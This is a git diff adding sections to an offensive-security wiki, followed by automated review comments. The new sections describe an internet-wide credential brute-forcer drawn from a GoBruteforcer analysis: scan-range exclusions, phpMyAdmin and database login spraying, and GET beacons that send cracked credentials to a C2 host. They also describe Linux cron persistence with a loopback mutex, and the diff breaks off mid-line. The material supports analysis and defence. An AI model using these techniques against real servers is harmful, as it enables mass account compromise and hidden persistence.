diff --git a/src/generic-hacking/brute-force.md b/src/generic-hacking/brute-force.md index d0ed72f15f2..12e7bd218d0 100644 --- a/src/generic-hacking/brute-force.md +++ b/src/generic-hacking/brute-force.md @@ -95,6 +95,14 @@ Finished in 0.920s. - [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager) - [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists) +## Internet-wide bruteforcer workflow (lessons from Go-based scanners) + +- Maintain **architecture-tuned worker pools** (for example, ~95 goroutines on `x86_64/arm64`, ~85 on `i686`, ~50 on low-end ARM) and respawn every second to keep **fixed concurrency**, with each worker handling exactly one target IP before exiting. +- Generate **random public IPv4s** but drop obvious honeypot-heavy or unroutable ranges: RFC1918, `100.64.0.0/10`, `127.0.0.0/8`, `0.0.0.0/8`, `169.254.0.0/16`, `198.18.0.0/15`, multicast `>=224.0.0.0/4`, cloud-heavy `/8`s (`3/15/16/56`) and DoD-associated `/8`s (`6/7/11/21/22/26/28/29/30/33/55/214/215`). +- **Probe the service port** with a short timeout (~2s) before attempting **cleartext logins** (FTP/21, MySQL/3306, Postgres/5432, phpMyAdmin over HTTP/80) and fall back to a **small builtin credential list** if the remote dictionary/C2 fetch fails. +- **Exfiltrate hits** via tiny HTTP GET beacons such as `http://:9090/pst?i=&c=&u=&p=&e=` (service codes like `1=PMA`, `2=MySQL`, `3=FTP`, `4=Postgres`) while reusing a common browser User-Agent to blend in. +- **phpMyAdmin spray** can brute-force dozens of likely paths (~80+) with `GET /index.php?lang=en`, detect PMA markers (`pmahomme` theme/`phpmyadmin.css`/`navigation.php`) and parse `codemirror.css?v=X.Y.Z` to branch auth: versions `<4.9` accept GET params `pma_username`/`pma_password`; versions `>=4.9` require POST with `server=1`, CSRF `token`, and the same creds. + ## Services Ordered alphabetically by service name. 
@@ -893,6 +901,10 @@ Cracking Common Application Hashes 1700 | SHA-512 | Raw Hash ``` +## References + +- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/) + {{#include ../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md index 02ca7d343ac..4bc1770c6f3 100644 --- a/src/linux-hardening/linux-post-exploitation/README.md +++ b/src/linux-hardening/linux-post-exploitation/README.md @@ -120,6 +120,17 @@ Hardening - Avoid embedding creds in unit files; prefer root-only readable drop-in files and remove them from version control - Rotate leaked passwords discovered during tests +## Cron-based persistence with loopback mutex + +- Copy implants into multiple writable paths (`/tmp`, `/var/tmp`, `/dev/shm`, `/run/lock`) and install cron entries such as `*/5 * * * * /tmp/` so they respawn even if removed elsewhere. +- Enforce **single-instance** execution by binding a fixed loopback port (for example, `127.0.0.1:51125` or `127.0.0.1:52225`) and exiting if `bind()` fails; `ss -lntp | grep -E '51125|52225'` will reveal the mutex listener. +- Operators may periodically mass-kill any process whose `cmdline` contains the dropper name (e.g., `init_stop`), so reusing those names during analysis can collide; pick unique filenames. + +## Process masquerading via prctl + argv overwrite + +- Set the short process name with `prctl(PR_SET_NAME, "
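Review bot: in the first brute-force.md hunk, the beacon example in the "Exfiltrate hits" bullet, `http://:9090/pst?i=&c=&u=&p=&e=`, has lost its host and parameter placeholders (most likely angle-bracket tokens eaten by the markdown renderer), so it now reads as an empty host with empty values; write them as escaped or backticked placeholders such as `<c2-host>` and `<target-ip>` so the meaning of each field survives, and consider stating that the fixed path and key set (`/pst?i=&c=&u=&p=&e=`) plus the service codes make a straightforward egress signature for defenders. The exclusion list also mixes notations: `>=224.0.0.0/4` is a comparison and a CIDR at once, `RFC1918` names no ranges, and `3/15/16/56` are bare numbers; use one plain CIDR form throughout (`224.0.0.0/4`, `3.0.0.0/8`, and so on). Finally, the heading promises "lessons from Go-based scanners" but every bullet describes a single sample; name the source in the section's first line (the Check Point GoBruteforcer write-up this patch adds under References) so the claims about excluded `/8`s and the phpMyAdmin version branching are attributable.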
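Review bot: the reference added in the second brute-force.md hunk is never cited from the section it supports; link it inline from the "Internet-wide bruteforcer workflow" section rather than leaving readers to connect a lone entry at the bottom of the page, otherwise the new bullets read as unsourced fact. Minor: the URL path carries the year 2026, so verify the link resolves before merge, since it is the only provenance these claims have.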
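Review bot: in the linux-post-exploitation README hunk, the cron example `*/5 * * * * /tmp/` has lost its file-name placeholder (same renderer issue as the beacon URL in the first file), so the line as written schedules a directory; restore a backticked placeholder. The detection hint `ss -lntp | grep -E '51125|52225'` is tied to two sample-specific ports and will miss any variant; generalize it to "any loopback-only listener whose owning process runs from `/tmp`, `/var/tmp`, `/dev/shm` or `/run/lock`", and note that `ss -p` only reports owners of other users' sockets when run as root. These bullets also sit directly after the page's "Hardening" list but describe only tradecraft; keep the page's convention by adding matching hardening items (audit user and system crontabs for entries invoking binaries from those writable paths, mount them `noexec` where feasible). The hunk ends mid-line at `prctl(PR_SET_NAME, "`, so the "Process masquerading via prctl + argv overwrite" section cannot be reviewed here; confirm the committed file is complete.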